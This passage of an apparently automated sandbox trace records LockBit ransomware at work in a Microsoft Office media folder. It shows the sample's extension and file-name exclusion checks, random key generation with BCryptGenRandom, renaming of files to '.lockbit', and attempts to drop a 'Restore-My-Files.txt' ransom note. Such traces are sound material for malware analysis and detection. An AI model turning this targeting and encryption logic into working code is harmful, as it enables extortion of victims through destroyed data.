lpString2=".WMF") returned -1 [0196.700] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.700] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.700] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.700] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.700] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.700] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.700] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.700] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.700] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.701] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.701] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0196400.WMF.lockbit") returned 70 [0196.701] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0196400.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0196400.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0196.703] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.703] malloc (_Size=0x40068) returned 0x3e70008 [0196.703] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=36030) returned 1 [0196.703] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.703] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.703] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0196.704] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.704] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.704] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0196.704] ReadFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0196.706] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0196400.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0196400.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.706] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.707] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0196.708] free (_Block=0x1fa2ed8) [0196.708] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0196400.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.708] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.708] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.708] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91fc00, ftCreationTime.dwHighDateTime=0x1bdf0c6, ftLastAccessTime.dwLowDateTime=0xbd4c6ce0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x91fc00, ftLastWriteTime.dwHighDateTime=0x1bdf0c6, nFileSizeHigh=0x0, nFileSizeLow=0x2518, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0199036.WMF", cAlternateFileName="")) returned 1 [0196.708] lstrcmpiW (lpString1=".", lpString2="J0199036.WMF") returned -1 [0196.708] lstrcmpiW (lpString1="..", lpString2="J0199036.WMF") returned -1 [0196.708] PathFindExtensionW (pszPath="J0199036.WMF") returned=".WMF" [0196.708] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.708] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.708] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.708] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.709] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.709] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.709] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.709] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.709] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.709] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.709] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.709] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.709] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.709] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.709] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.709] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.709] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.709] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.709] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.709] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.709] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.709] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.710] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.710] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.710] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.710] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.710] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.710] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.710] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.710] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.710] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.710] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.710] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.710] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.710] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.710] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.710] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.710] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.710] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.711] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.711] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.711] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.711] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.711] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.711] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.711] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.711] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.711] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0199036.WMF") returned 1 [0196.711] lstrcmpiW (lpString1="ntldr", lpString2="J0199036.WMF") returned 1 [0196.711] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0199036.WMF") returned 1 [0196.711] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0199036.WMF") returned -1 [0196.711] lstrcmpiW (lpString1="autorun.inf", lpString2="J0199036.WMF") returned -1 [0196.711] lstrcmpiW (lpString1="thumbs.db", lpString2="J0199036.WMF") returned 1 [0196.711] lstrcmpiW (lpString1="iconcache.db", lpString2="J0199036.WMF") returned -1 [0196.711] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.711] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199036.WMF") returned=".WMF" [0196.711] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.711] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.712] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.712] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.712] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.712] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.712] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.712] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.712] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.712] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.712] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.712] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.712] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.712] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.712] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.712] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.712] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.712] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.712] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.712] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.712] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.713] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.713] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.713] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.713] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.713] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.713] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.713] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.713] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199036.WMF.lockbit") returned 70 [0196.713] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199036.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0199036.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0196.714] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.714] malloc (_Size=0x40068) returned 0x3f70048 [0196.714] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=9496) returned 1 [0196.714] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.715] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.715] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0196.715] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.715] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.716] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0196.716] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0196.718] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199036.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199036.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.718] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.718] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0196.719] free (_Block=0x1fa2ed8) [0196.719] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199036.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.719] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.719] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.719] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebd55500, ftCreationTime.dwHighDateTime=0x1be05ec, ftLastAccessTime.dwLowDateTime=0xbd4c6ce0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xebd55500, ftLastWriteTime.dwHighDateTime=0x1be05ec, nFileSizeHigh=0x0, nFileSizeLow=0x8ec4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0199283.WMF", cAlternateFileName="")) returned 1 [0196.720] lstrcmpiW (lpString1=".", lpString2="J0199283.WMF") returned -1 [0196.720] lstrcmpiW (lpString1="..", lpString2="J0199283.WMF") returned -1 [0196.720] PathFindExtensionW (pszPath="J0199283.WMF") returned=".WMF" [0196.720] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.720] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.720] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.720] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.720] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.720] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.720] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.720] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.720] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.720] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.720] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.720] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.720] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.720] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.720] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.721] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.721] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.721] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.721] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.721] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.721] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.721] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.721] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.721] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.721] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.721] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.721] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.721] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.721] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.721] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.721] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.721] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.721] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.721] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.722] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.722] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.722] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.722] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.722] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.722] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.722] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.722] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.722] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.722] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.722] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.722] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.722] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.722] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0199283.WMF") returned 1 [0196.722] lstrcmpiW (lpString1="ntldr", lpString2="J0199283.WMF") returned 1 [0196.722] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0199283.WMF") returned 1 [0196.722] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0199283.WMF") returned -1 [0196.722] lstrcmpiW (lpString1="autorun.inf", lpString2="J0199283.WMF") returned -1 [0196.722] lstrcmpiW (lpString1="thumbs.db", lpString2="J0199283.WMF") returned 1 [0196.723] lstrcmpiW (lpString1="iconcache.db", lpString2="J0199283.WMF") returned -1 [0196.723] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.723] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199283.WMF") returned=".WMF" [0196.723] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.723] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.723] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.723] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.723] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.723] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.723] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.723] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.723] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.723] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.723] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.723] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.723] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.723] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.723] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.724] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.724] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.724] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.724] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.724] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.724] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.724] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.724] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.724] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.724] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.724] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.724] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.724] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.724] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199283.WMF.lockbit") returned 70 [0196.724] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199283.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0199283.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0196.725] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.725] malloc (_Size=0x40068) returned 0x3ef0008 [0196.726] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=36548) returned 1 [0196.726] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.726] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0196.726] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.727] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.727] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0196.727] ReadFile (in: hFile=0x330, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0196.747] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199283.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199283.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.747] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.747] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0196.750] free (_Block=0x1fa2ed8) [0196.750] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199283.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.750] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.750] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.750] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54b53500, ftCreationTime.dwHighDateTime=0x1be3e9a, ftLastAccessTime.dwLowDateTime=0xbd4c6ce0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x54b53500, ftLastWriteTime.dwHighDateTime=0x1be3e9a, nFileSizeHigh=0x0, nFileSizeLow=0xf5e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0199549.WMF", cAlternateFileName="")) returned 1 [0196.750] lstrcmpiW (lpString1=".", lpString2="J0199549.WMF") returned -1 [0196.751] lstrcmpiW (lpString1="..", lpString2="J0199549.WMF") returned -1 [0196.751] PathFindExtensionW (pszPath="J0199549.WMF") returned=".WMF" [0196.751] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.751] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.751] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.751] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.751] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.751] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.751] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.751] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.751] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.751] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.751] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.751] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.751] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.751] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.751] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.751] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.751] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.751] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.751] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.751] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.751] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.751] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.751] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") 